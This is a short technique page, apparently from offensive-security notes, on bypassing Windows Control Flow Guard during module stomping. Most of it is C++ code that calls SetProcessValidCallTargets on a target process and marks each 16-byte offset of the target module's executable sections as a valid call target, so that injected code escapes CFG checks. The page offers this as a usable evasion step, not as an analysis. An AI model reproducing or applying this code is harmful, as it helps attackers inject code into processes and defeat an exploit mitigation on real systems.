CFG
Control Flow Guard
CFG Bypasses for Module Stomping
Patch
Mark as Valid (SetProcessValidCallTargets)
Mark everything in the target module as valid:
void markCFGValid(unsigned long long ptrToMarkValid)
{
CFG_CALL_TARGET_INFO info;
info.Flags = CFG_CALL_TARGET_VALID;
info.Offset = ptrToMarkValid;
if (!SetProcessValidCallTargets_(targetProcess, targetModuleBase, sizeOfImage, 1, &info))
throw std::exception("SetProcessValidCallTargets failed");
}
if (srcSect.Characteristics & IMAGE_SCN_MEM_EXECUTE)
for (unsigned int n = 0; n < srcSect.VirtualSize; n += 16)
targetModule.markCFGValid(n);Last updated